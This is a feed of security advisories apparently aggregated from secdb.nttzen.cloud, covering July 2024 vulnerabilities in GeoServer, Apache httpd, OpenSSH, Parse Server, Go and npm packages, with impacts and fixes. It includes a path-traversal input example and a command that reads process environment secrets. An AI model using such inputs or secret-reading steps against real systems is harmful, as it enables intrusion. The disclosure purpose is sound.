01.07.2024 22:24:05	maven	[MAVEN:GHSA-JHQX-5V5G-MPF3] Classpath resource disclosure in GWC Web Resource API on Windows / Tomcat (high)	### ImpactIf GeoServer is deployed in the Windows operating system using an Apache Tomcat web application server, it is possible to bypass existing input validation in the GeoWebCache ByteStreamController class and read arbitrary classpath resources with specific file name extensions.If GeoServer is also deployed as a web archive using the data directory embedded in the geoserver.war file (rather than an external data directory), it will likely be possible to read specific resources to gain administrator privileges. However, it is very unlikely that production environments will be using the embedded data directory since, depending on how GeoServer is deployed, it will be erased and re-installed (which would also reset to the default password) either every time the server restarts or every time a new GeoServer WAR is installed and is therefore difficult to maintain. An external data directory will always be used if GeoServer is running in standalone mode (via an installer or a binary).### Patcheshttps://github.com/GeoWebCache/geowebcache/pull/1211### WorkaroundsChange environment:* Change from Windows operating system. This vulnerability depends on Windows file paths so Linux and Mac OS are not vulnerable.* Change from Apache Tomcat application server. Jetty and WildFly are confirmed to not be vulnerable. Other application servers have not been tested and may be vulnerable.Disable anonymous access to the embeded GeoWebCache administration and status pages:1. Navigate to Security > Authentication Page2. Locate Filter Chains heading3. Select the ``web`` filter filter chain (ant pattern ``/web/,/gwc/rest/web/,/``)4. Remove ``,/gwc/rest/web/`` from the pattern (so that ``/web/,/`` is left).5. Save the changes### References* CVE-Pending	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-JHQX-5V5G-MPF3
01.07.2024 22:20:59	maven	[MAVEN:GHSA-J59V-VGCR-HXVF] GeoServer's Server Status shows sensitive environmental variables and Java properties (moderate)	GeoServer's Server Status page and REST API (at `/geoserver/rest/about/status`) lists all environment variables and Java properties to any GeoServer user with administrative rights as part of those modules' status message.These variables/properties can also contain sensitive information, such as database passwords or API keys/tokens, for example:* Data stores defined with [parameterized catalog settings][catalog] (`-DALLOW_ENV_PARAMETRIZATION=true`) which need a password or access key.* GeoServer's official Docker image [uses environment variables to configure PostgreSQL JNDI resources, including credentials][docker-jndi] (`POSTGRES_HOST`, `POSTGRES_USERNAME`, `POSTGRES_PASSWORD`)Additionally, many community-developed GeoServer container images `export` other credentials from their start-up scripts as environment variables to the GeoServer (`java`) process, such as:* GeoServer `admin` and master (`root`) passwords* Tomcat management application password* HTTPS/TLS certificate key store password* AWS S3 bucket access keysThe precise scope of the issue depends on which container image is used and how it is configured.> [!NOTE]> Some container images allow passing secrets as files (eg: `POSTGRES_PASSWORD_FILE`), or randomly generating passwords on start-up. While this is promoted as best-practice[^secret-files], if its start-up script [`export`s these as environment variables][bash-export] to GeoServer, they are also impacted by this issue.[bash-export]: https://www.gnu.org/software/bash/manual/html_node/Bourne-Shell-Builtins.html#index-export[catalog]: https://docs.geoserver.org/latest/en/user/datadirectory/configtemplate.html[docker-jndi]: https://github.com/geoserver/docker/blob/master/README.md#how-to-enable-a-postgresql-jndi-resource### ImpactThe “about status” API endpoint (at `/geoserver/rest/about/status`) which powers the Server Status page is only available to administrators.Depending on the operating environment, administrators might have legitimate access to credentials in other ways, but this issue defeats more sophisticated controls (like break-glass access to secrets or role accounts).By default, GeoServer only allows same-origin authenticated API access. This limits the scope for a third-party attacker to use an administrator’s credentials to gain access to credentials (ie: requires XSS).We were unable to determine any other conditions under which the GeoServer REST API may be available more broadly.### Fixes / remediationGeoServer 2.24.4 and 2.25.1 hide all environment variables and Java system properties by default, with no further action required by GeoServer administrators.[There are new settings to allow an administrator to display these again][showing] – effectively reverting this security fix. We strongly recommend administrators leave these settings as-is, and use alternative mechanisms to access environment variables (instructions below).If you're using GeoServer in a container runtime (such as Docker or Kubernetes) or from some other distributor's packages, you'll need to wait for the maintainer to update the version of GeoServer used in their image.> [!WARNING]> If you run GeoServer with [parameterized catalog settings][catalog] (`-DALLOW_ENV_PARAMETRIZATION=true`), a GeoServer administrator could use this to access any environment variable or Java property by including it in some field which is rendered by the UI (such as the description field), even with this fix.[showing]: https://docs.geoserver.org/latest/en/user/production/config.html#showing-environment-variables-and-java-system-properties### Advice for container / Docker image maintainersUpdate container images to use GeoServer 2.24.4 or 2.25.1 to get the bug fix.Please leave environment variables and Java system properties hidden by default. If you provide the option to re-enable it, [communicate the impact and risks][showing] so that users can make an informed choice.Container images should practice "defence in depth", to limit the impact when it is configured to show environment variables and/or properties:* Pass secrets to the container as either: * files which are only readable by the GeoServer process/UID, or, * references (identifiers) to a secret stored in a cloud provider's metadata or secret management service* Pass secrets to GeoServer by generating configuration files as part of your start-up scripts, rather than passing variables/properties or relying on [parameterized catalog settings][catalog].* Ensure any configuration files with secrets are not readable by other users.* Clear all environment variables which contain secrets _before_ starting GeoServer. _Alternatively:_ start up GeoServer with only the environment variables it needs, and no secrets.* Don't pass secrets as command-line flags – these are shown in `ps` to all users!### Alternatives for displaying GeoServer's environment variables* On Linux, you can get all environment variables [set at _start-up time_][linux-environ] for a running process with: ```sh tr '\0' '\n' < /proc/${GEOSERVER_PID}/environ ```* On Windows, [SysInternals' Process Explorer][proc-exp] can show running processes' environment variables.* Current versions of macOS do not allow arbitrary access to other running processes' environment variables. Disabling these restrictions (on a macOS level) would significantly reduce the overall security of the system.[linux-environ]: https://unix.stackexchange.com/a/70636[proc-exp]: https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer[^secret-files]: [Docker Compose: How to use secrets in Docker Compose](https://docs.docker.com/compose/use-secrets/), [Docker Swarm: Build support for Docker Secrets into your images](https://docs.docker.com/engine/swarm/secrets/#build-support-for-docker-secrets-into-your-images)	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-J59V-VGCR-HXVF
01.07.2024 22:15:05	alpinelinux	[ALPINE:CVE-2024-38477] apache2 vulnerability	[From CVE-2024-38477] null pointer dereference in mod_proxy in Apache HTTP Server 2.4.59 and earlier allows an attacker to crash the server via a malicious request.Users are recommended to upgrade to version 2.4.60, which fixes this issue.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-38477
01.07.2024 22:15:05	alpinelinux	[ALPINE:CVE-2024-39573] apache2 vulnerability	[From CVE-2024-39573] Potential SSRF in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows an attacker to cause unsafe RewriteRules to unexpectedly setup URL's to be handled by mod_proxy.Users are recommended to upgrade to version 2.4.60, which fixes this issue.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-39573
01.07.2024 22:15:04	alpinelinux	[ALPINE:CVE-2024-38472] apache2 vulnerability	[From CVE-2024-38472] SSRF in Apache HTTP Server on Windows allows to potentially leak NTML hashes to a malicious server via SSRF and malicious requests or content Users are recommended to upgrade to version 2.4.60 which fixes this issue. Note: Existing configurations that access UNC paths will have to configure new directive "UNCList" to allow access during request processing.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-38472
01.07.2024 22:15:04	alpinelinux	[ALPINE:CVE-2024-38473] apache2 vulnerability	[From CVE-2024-38473] Encoding problem in mod_proxy in Apache HTTP Server 2.4.59 and earlier allows request URLs with incorrect encoding to be sent to backend services, potentially bypassing authentication via crafted requests.Users are recommended to upgrade to version 2.4.60, which fixes this issue.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-38473
01.07.2024 22:15:04	alpinelinux	[ALPINE:CVE-2024-38474] apache2 vulnerability	[From CVE-2024-38474] Substitution encoding issue in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows attacker to execute scripts indirectories permitted by the configuration but not directly reachable by any URL or source disclosure of scripts meant to only to be executed as CGI.Users are recommended to upgrade to version 2.4.60, which fixes this issue.Some RewriteRules that capture and substitute unsafely will now fail unless rewrite flag "UnsafeAllow3F" is specified.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-38474
01.07.2024 22:15:04	alpinelinux	[ALPINE:CVE-2024-38475] apache2 vulnerability	[From CVE-2024-38475] Improper escaping of output in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows an attacker to map URLs to filesystem locations that are permitted to be served by the server but are not intentionally/directly reachable by any URL, resulting in code execution or source code disclosure. Substitutions in server context that use a backreferences or variables as the first segment of the substitution are affected. Some unsafe RewiteRules will be broken by this change and the rewrite flag "UnsafePrefixStat" can be used to opt back in once ensuring the substitution is appropriately constrained.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-38475
01.07.2024 22:15:04	alpinelinux	[ALPINE:CVE-2024-38476] apache2 vulnerability	[From CVE-2024-38476] Vulnerability in core of Apache HTTP Server 2.4.59 and earlier are vulnerably to information disclosure, SSRF or local script execution via backend applications whose response headers are malicious or exploitable.Users are recommended to upgrade to version 2.4.60, which fixes this issue.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-38476
01.07.2024 22:15:03	alpinelinux	[ALPINE:CVE-2024-36387] apache2 vulnerability	[From CVE-2024-36387] Serving WebSocket protocol upgrades over a HTTP/2 connection could result in a Null Pointer dereference, leading to a crash of the server process, degrading performance.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-36387
02.07.2024 05:40:44	npm	[NPM:GHSA-C2HR-CQG6-8J6R] ZDI-CAN-23894: Parse Server literalizeRegexPart SQL Injection Authentication Bypass Vulnerability (critical)	### ImpactThis vulnerability allows SQL injection when Parse Server is configured to use the PostgreSQL database.### PatchesThe algorithm to detect SQL injection has been improved.### WorkaroundsNone.### References- https://github.com/parse-community/parse-server/security/advisories/GHSA-c2hr-cqg6-8j6r- https://github.com/parse-community/parse-server/pull/9167 (fix for Parse Server 7)- https://github.com/parse-community/parse-server/pull/9168 (fix for Parse Server 6)### Credits- Smile Thanapattheerakul of Trend Micro (finder)- Manuel Trezza (coordinator)	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-C2HR-CQG6-8J6R
01.07.2024 21:16:17	go	[GO-2024-2920] Denial of service vulnerability via the parseDirectives function in github.com/vektah/gqlparser	An issue in vektah gqlparser open-source-library allows a remoteattacker to cause a denial of service via a crafted script to theparseDirectives function.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2920
01.07.2024 21:16:17	go	[GO-2024-2921] HashiCorp Vault Incorrectly Validated JSON Web Tokens (JWT) Audience Claims ingithub.com/hashicorp/vault (low)		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2921
01.07.2024 21:16:17	go	[GO-2024-2930] RKE credentials are stored in the RKE1 Cluster state ConfigMap in github.com/rancher/rke	When RKE provisions a cluster, it stores the cluster state in a configmap called"full-cluster-state" inside the "kube-system" namespace of the cluster itself.This cluster state object contains information used to set up the K8s cluster,which may include sensitive data.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2930
01.07.2024 21:16:17	go	[GO-2024-2936] PocketBase performs password auth and OAuth2 unverified email linking in github.com/pocketbase/pocketbase (medium)		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2936
01.07.2024 21:16:17	go	[GO-2024-2943] Lightning Network Daemon (LND)'s onion processing logic leads to a denial ofservice in github.com/lightningnetwork/lnd (medium)		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2943
01.07.2024 19:00:00	cisco	[CISCO-SA-NXOS-CMD-INJECTION-XD9OHYOP] Cisco NX-OS Software CLI Command Injection Vulnerability (medium)	A vulnerability in the CLI of Cisco NX-OS Software could allow an authenticated, local attacker to execute arbitrary commands as root on the underlying operating system of an affected device.This vulnerability is due to insufficient validation of arguments that are passed to specific configuration CLI commands. An attacker could exploit this vulnerability by including crafted input as the argument of an affected configuration CLI command. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the privileges of root.Note: To successfully exploit this vulnerability on a Cisco NX-OS device, an attacker must have Administrator credentials.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NXOS-CMD-INJECTION-XD9OHYOP
02.07.2024 01:34:45	npm	[NPM:GHSA-88VR-HJQX-57QH] adolph_dudu ratio-swiper was discovered to contain a prototype pollution via the function extendDefaults (moderate)	adolph_dudu ratio-swiper v0.0.2 was discovered to contain a prototype pollution via the function extendDefaults. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-88VR-HJQX-57QH
02.07.2024 01:34:05	npm	[NPM:GHSA-876P-C77M-X2HC] ag-grid-community were discovered to contain a prototype pollution via the _.mergeDeep function (moderate)	ag-grid-community v31.3.2 and ag-grid-enterprise v31.3.2 were discovered to contain a prototype pollution via the _.mergeDeep function. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-876P-C77M-X2HC
02.07.2024 00:52:12	npm	[NPM:GHSA-W58V-R3CP-QR93] @amoy/common v was discovered to contain a prototype pollution via the function extend (moderate)	amoyjs amoy common v1.0.10 was discovered to contain a prototype pollution via the function extend. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-W58V-R3CP-QR93
02.07.2024 00:52:44	npm	[NPM:GHSA-4WM9-3QMV-GVXJ] jsonic was discovered to contain a prototype pollution via the function empty. (moderate)	rjrodger jsonic-next v2.12.1 was discovered to contain a prototype pollution via the function empty. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-4WM9-3QMV-GVXJ
02.07.2024 00:54:13	npm	[NPM:GHSA-GC7M-596H-X57R] frappejs was discovered to contain a prototype pollution via the function registerView (moderate)	airvertco frappejs v0.0.11 was discovered to contain a prototype pollution via the function registerView. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-GC7M-596H-X57R
02.07.2024 00:30:36	npm	[NPM:GHSA-GH4X-QV3P-M9PM] akbr patch-into was discovered to contain a prototype pollution via the function patchInto (moderate)	akbr patch-into v1.0.1 was discovered to contain a prototype pollution via the function patchInto. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-GH4X-QV3P-M9PM
01.07.2024 12:06:31	ubuntu	[USN-6859-1] OpenSSH vulnerability (high)	OpenSSH could be made to bypass authentication and remotelyaccess systems without proper credentials.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6859-1
01.07.2024 07:21:23	ubuntu	[USN-6858-1] eSpeak NG vulnerabilities (medium)	Several security issues were fixed in eSpeak NG.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6858-1
01.07.2024 03:00:00	archlinux	[ASA-202407-1] openssh: authentication bypass (high)		https://secdb.nttzen.cloud/security-advisory/archlinux/ASA-202407-1
01.07.2024 03:00:00	debian	[DSA-5724-1] openssh (high)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5724-1
01.07.2024 03:00:00	freebsd	[FREEBSD:F1A00122-3797-11EF-B611-84A93843EB75] OpenSSH -- Race condition resulting in potential remote code execution (high)	The OpenSSH project reports: A race condition in sshd(8) could allow remote code execution as root on non-OpenBSD systems.	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:F1A00122-3797-11EF-B611-84A93843EB75
01.07.2024 03:00:00	gentoo	[GLSA-202407-04] Pixman: Heap Buffer Overflow (normal)	A vulnerability has been discovered in Pixman, which can lead to a heap buffer overflow.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-04
01.07.2024 03:00:00	gentoo	[GLSA-202407-01] Zsh: Prompt Expansion Vulnerability (normal)	A vulnerability has been discovered in Zsh, which can lead to execution of arbitrary code.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-01
01.07.2024 03:00:00	gentoo	[GLSA-202407-02] SDL_ttf: Arbitrary Memory Write (normal)	A vulnerability has been discovered in SDL_ttf, which can lead to arbitrary memory writes.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-02
01.07.2024 03:00:00	gentoo	[GLSA-202407-03] Liferea: Remote Code Execution (normal)	A vulnerability has been discovered in Liferea, which can lead to remote code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-03
01.07.2024 03:00:00	gentoo	[GLSA-202407-05] SSSD: Command Injection (normal)	A vulnerability has been discovered in SSSD, which can lead to arbitrary code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-05
01.07.2024 03:00:00	gentoo	[GLSA-202407-06] cryptography: Multiple Vulnerabilities (normal)	Multiple vulnerabilities have been discovered in cryptography, the worst of which could lead to a denial of service.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-06
01.07.2024 03:00:00	gentoo	[GLSA-202407-07] cpio: Arbitrary Code Execution (normal)	A vulnerability has been discovered in cpio, which can lead to arbitrary code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-07
01.07.2024 03:00:00	gentoo	[GLSA-202407-08] GNU Emacs, Org Mode: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discovered in GNU Emacs and Org Mode, the worst of which could lead to arbitrary code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-08
01.07.2024 03:00:00	gentoo	[GLSA-202407-09] OpenSSH: Remote Code Execution (high)	A vulnerability has been discovered in OpenSSH, which can lead to remote code execution with root privileges.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-09
01.07.2024 03:00:00	oraclelinux	[ELSA-2024-12468] openssh security update (important)	[8.7p1-38.0.2]- Restore dropped earlier ifdef condition for safe _exit(1) call in sshsigdie() [Orabug: 36783468] Resolves CVE-2024-6387	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-12468
01.07.2024 03:00:00	oraclelinux	[ELSA-2024-4197] httpd:2.4/httpd security update (moderate)	httpd[2.4.37-65.0.1]- Replace index.html with Oracle's index page oracle_index.html[2.4.37-65]- Resolves: RHEL-31857 - httpd:2.4/httpd: HTTP response splitting (CVE-2023-38709)mod_http2mod_md	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4197
01.07.2024 03:00:00	redhat	[RHSA-2024:4197] httpd:2.4/httpd security update (moderate)	The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.Security Fix(es):* httpd:2.4: httpd: HTTP response splitting (CVE-2023-38709)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4197
01.07.2024 19:16:25	maven	[MAVEN:GHSA-CF3Q-VG8W-MW84] Apache StreamPipes: Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) in Recovery Token Generation (moderate)	Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) vulnerability in Apache StreamPipes user self-registration and password recovery mechanism.This allows an attacker to guess the recovery token in a reasonable time and thereby to take over the attacked user's account.This issue affects Apache StreamPipes: from 0.69.0 through 0.93.0.Users are recommended to upgrade to version 0.95.0, which fixes the issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-CF3Q-VG8W-MW84
30.06.2024 03:00:00	freebsd	[FREEBSD:C742DBE8-3704-11EF-9E6E-B42E991FC52E] netatalk3 -- Multiple vulnerabilities	cve@mitre.org reports: This entry documents the following three vulnerabilities: Netatalk before 3.2.1 has an off-by-one error and resultant heap-based buffer overflow because of setting ibuf[len] to '\0' in FPMapName in afp_mapname in etc/afpd/directory.c. 2.4.1 and 3.1.19 are also fixed versions. Netatalk before 3.2.1 has an off-by-one error, and resultant heap-based buffer overflow and segmentation violation, because of incorrectly using FPLoginExt in BN_bin2bn in etc/uams/uams_dhx_pam.c. The original issue 1097 report stated: 'The latest version of Netatalk (v3.2.0) contains a security vulnerability. This vulnerability arises due to a lack of validation for the length field after parsing user-provided data, leading to an out-of-bounds heap write of one byte (\0). Under specific configurations, this can result in reading metadata of the next heap block, potentially causing a Denial of Service (DoS) under certain heap layouts or with ASAN enabled. ... Netatalk before 3.2.1 has an off-by-one error and resultant heap-based buffer overflow because of setting ibuf[PASSWDLEN] to '\0' in FPLoginExt in login in etc/uams/uams_pam.c. 2.4.1 and 3.1.19 are also fixed versions.	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:C742DBE8-3704-11EF-9E6E-B42E991FC52E
02.07.2024 22:59:20	go	[GO-2024-2963] Denial of service due to improper 100-continue handling in net/http	The net/http HTTP/1.1 client mishandled the case where a server responds to arequest with an "Expect: 100-continue" header with a non-informational (200 orhigher) status. This mishandling could leave a client connection in an invalidstate, where the next request sent on the connection will fail.An attacker sending a request to a net/http/httputil.ReverseProxy proxy canexploit this mishandling to cause a denial of service by sending "Expect:100-continue" requests which elicit a non-informational response from thebackend. Each such request leaves the proxy with an invalid connection, andcauses one subsequent request using that connection to fail.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2963
02.07.2024 22:50:00	cisco	[CISCO-SA-OPENSSH-RCE-2024] Remote Unauthenticated Code Execution Vulnerability in OpenSSH Server (regreSSHion): July 2024 (high)	On July 1, 2024, the Qualys Threat Research Unit (TRU) disclosed an unauthenticated, remote code execution vulnerability that affects the OpenSSH server (sshd) in glibc-based Linux systems.CVE-2024-6387: A signal handler race condition was found in sshd, where a client does not authenticate within LoginGraceTime seconds (120 by default, 600 in old OpenSSH versions), then the sshd SIGALRM handler is called asynchronously. However, this signal handler calls various functions that are not async-signal-safe, for example, syslog().For a description of this vulnerability, see the Qualys Security Advisory ["https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt"].This advisory will be updated as additional information becomes available.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-OPENSSH-RCE-2024
02.07.2024 22:38:48	slackware	[SSA:2024-184-01] httpd	New httpd packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/httpd-2.4.60-i586-2_slack15.0.txz: Rebuilt. This update is to fix a regression and to note security issues that were not listed in the CHANGES file included with the source code. Fixed a regression where a config file using AddType rather than AddHandler could cause raw PHP files to be downloaded rather than processed. Thanks to Nobby6. For more information, see: https://downloads.apache.org/httpd/CHANGES_2.4.60 https://www.cve.org/CVERecord?id=CVE-2024-39573 https://www.cve.org/CVERecord?id=CVE-2024-38477 https://www.cve.org/CVERecord?id=CVE-2024-38476 https://www.cve.org/CVERecord?id=CVE-2024-38475 https://www.cve.org/CVERecord?id=CVE-2024-38474 https://www.cve.org/CVERecord?id=CVE-2024-38473 https://www.cve.org/CVERecord?id=CVE-2024-38472 https://www.cve.org/CVERecord?id=CVE-2024-36387 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/httpd-2.4.60-i586-2_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/httpd-2.4.60-x86_64-2_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/httpd-2.4.60-i586-2.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/httpd-2.4.60-x86_64-2.txzMD5 signaturesSlackware 15.0 package:5f7180a311268d3249d7ae426caa04d5 httpd-2.4.60-i586-2_slack15.0.txzSlackware x86_64 15.0 package:c98b552d4a9532e071663814d81695c4 httpd-2.4.60-x86_64-2_slack15.0.txzSlackware -current package:148986bd904948f5208e56cc7fba415b n/httpd-2.4.60-i586-2.txzSlackware x86_64 -current package:d20a1b2e0183b8c47b6cde7fd1a2e24a n/httpd-2.4.60-x86_64-2.txzInstallation instructions*Upgrade the package as root:`# upgradepkg httpd-2.4.60-i586-2_slack15.0.txz`Then, restart Apache httpd:`# /etc/rc.d/rc.httpd stop``# /etc/rc.d/rc.httpd start`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-184-01
02.07.2024 20:29:08	go	[GO-2024-2951] Denial of service when syncing with a malicious peer ingithub.com/cometbft/cometbft	A malicious peer can cause a syncing node to panic during blocksync. The syncingnode may enter into a catastrophic invalid syncing state or get stuck inblocksync mode, never switching to consensus. Nodes that are vulnerable to thisstate may experience a Denial of Service condition in which syncing will notwork as expected when joining a network as a client.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2951
02.07.2024 20:15:04	alpinelinux	[ALPINE:CVE-2023-39324] go vulnerability	[From CVE-2023-39324] Rejected reason: reserved but not needed	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-39324
02.07.2024 20:12:06	go	[GO-2024-2955] Gin mishandles a wildcard in the origin string in github.com/gin-contrib/cors	Gin-Gonic CORS middleware mishandles a wildcard at the end of an origin string.Examples: https://example.community/* is accepted by the origin stringhttps://example.com/* and http://localhost.example.com/* is accepted by theorigin string http://localhost/* .	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2955
02.07.2024 20:05:05	go	[GO-2024-2961] Limited directory traversal vulnerability on Windows in golang.org/x/crypto	httpTokenCacheKey uses path.Base to extract the expected HTTP-01 token value tolookup in the DirCache implementation. On Windows, path.Base acts differently tofilepath.Base, since Windows uses a different path separator (\ vs. /), allowinga user to provide a relative path, i.e. .well-known/acme-challenge/..\..\asdbecomes ..\..\asd. The extracted path is then suffixed with +http-01, joinedwith the cache directory, and opened.Since the controlled path is suffixed with +http-01 before opening, the impactof this is significantly limited, since it only allows reading arbitrary fileson the system if and only if they have this suffix.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2961
02.07.2024 20:05:05	go	[GO-2024-2962] Output of "go env" does not sanitize values in cmd/go	Command go env is documented as outputting a shell script containing the Goenvironment. However, go env doesn't sanitize values, so executing its output asa shell script can cause various bad bahaviors, including executing arbitrarycommands or inserting new environment variables.This issue is relatively minor because, in general, if an attacker can setarbitrary environment variables on a system, they have better attack vectorsthan making "go env" print them out.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2962
02.07.2024 18:59:43	go	[GO-2024-2519] Grafana world readable configuration files in github.com/grafana/grafana (medium)		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2519
02.07.2024 18:44:11	go	[GO-2024-2567] Panic in Pipeline when PgConn is busy or closed in github.com/jackc/pgx	Pipeline can panic when PgConn is busy or closed.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2567
02.07.2024 18:35:39	go	[GO-2024-2883] Denial of service via malicious preflight requests in github.com/rs/cors	Middleware causes a prohibitive amount of heap allocations when processingmalicious preflight requests that include a Access-Control-Request-Headers(ACRH) header whose value contains many commas. This behavior can be abused byattackers to produce undue load on the middleware/server as an attempt to causea denial of service.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2883
02.07.2024 18:20:34	go	[GO-2024-2958] Potential memory exhaustion attack due to sparse slice deserialization in github.com/gorilla/schema (high)		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2958
02.07.2024 18:20:34	go	[GO-2024-2959] Session Middleware Token Injection Vulnerability in github.com/gofiber/fiber (critical)		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2959
02.07.2024 17:15:13	alpinelinux	[ALPINE:CVE-2024-38519] yt-dlp vulnerability (high)	[From CVE-2024-38519] `yt-dlp` is a command-line audio/video downloader. Prior to version 2024.07.01, `yt-dlp` does not limit the extensions of downloaded files, which could lead to aribitrary filenames being created in the download folder (and path traversal on Windows). Since `yt-dlp` also reads config from the working directory (and on Windows executables will be executed from the yt-dlp directory) this could lead to arbitrary code being executed. `yt-dlp` version 2024.07.01 fixes this issue by whitelisting the allowed extensions. This might mean some very uncommon extensions might not get downloaded, however it will also limit the possible exploitation surface. In addition to upgrading, have `.%(ext)s` at the end of the output template and make sure the user trusts the websites that they are downloading from. Also, make sure to never download to a directory within PATH or other sensitive locations like one's user directory, `system32`, or other binaries locations. For users who are not able to upgrade, keep the default output template (`-o "%(title)s [%(id)s].%(ext)s`); make sure the extension of the media to download is a common video/audio/sub/... one; try to avoid the generic extractor; and/or use `--ignore-config --config-location ...` to not load config from common locations.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-38519
02.07.2024 17:13:09	rockylinux	[RLSA-2024:3954] firefox security update (important)	An update is available for firefox.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:3954
02.07.2024 17:13:09	rockylinux	[RLSA-2024:3961] flatpak security update (important)	An update is available for flatpak.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:3961
02.07.2024 17:13:09	rockylinux	[RLSA-2024:4000] ghostscript security update (important)	An update is available for ghostscript.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:4000
02.07.2024 17:13:09	rockylinux	[RLSA-2024:4036] thunderbird security update (important)	An update is available for thunderbird.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:4036
